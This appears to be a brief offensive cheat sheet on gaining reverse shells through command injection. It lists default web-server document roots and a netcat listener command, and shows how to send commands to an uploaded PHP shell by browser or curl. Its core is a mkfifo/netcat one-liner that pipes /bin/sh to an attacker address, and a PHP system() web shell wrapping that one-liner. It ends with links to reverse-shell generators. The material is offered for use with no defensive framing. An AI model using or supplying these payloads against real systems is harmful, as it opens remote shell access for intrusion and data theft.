Reverse Shells

Command injection

To be able to execute the reverse shell we first need to be able to inject commands:

Command injection

---

Default Webroot for common web servers

Apache    /var/www/html/
Nginx     /usr/local/nginx/html/
IIS       C:\inetpub\wwwroot\
XAMPP     C:\xampp\htdocs\

Accessing the reverse shell

#Listening for the reverse shell with netcat
nc -lnvp Port

#Once the malicious shell script is passed to the victim:
 ##In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here

 ##Directly from the terminal
curl http://server_ip:port/shellScript.php?cmd=your_command_here

---

Scripts

PHP

#Get netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackIP ListeningPort) >/tmp/f
 ##Adapted for PHP
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f"); ?>

---

Online shell lists/generators

Revshells

Online - Reverse Shell Generator

Revshells

PayloadAllTheThings/Reverse

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

PayloadAllTheThings